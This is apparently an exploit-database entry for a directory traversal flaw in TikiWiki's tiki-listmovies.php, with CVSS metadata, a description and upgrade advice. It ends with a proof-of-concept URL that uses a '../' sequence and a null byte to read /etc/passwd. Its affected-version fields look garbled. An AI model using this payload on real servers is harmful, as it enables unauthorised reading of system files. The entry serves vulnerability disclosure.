header-logo
Suggest Exploit
vendor:
TikiWiki
by:
milw0rm.com
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: TikiWiki
Affected Version From: 1.9.2008
Affected Version To: 1.9.2009
Patch Exists: YES
Related CWE: N/A
CPE: a:tikiwiki:tikiwiki
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability

TikiWiki is vulnerable to a directory traversal attack when the 'movie' parameter of the tiki-listmovies.php script is supplied with a maliciously crafted value. This can allow an attacker to read arbitrary files from the server.

Mitigation:

Upgrade to the latest version of TikiWiki, which is 1.9.9 or later.
Source

Exploit-DB raw data:

TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability

http://www.vulnsite.com/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234

# milw0rm.com [2008-01-20]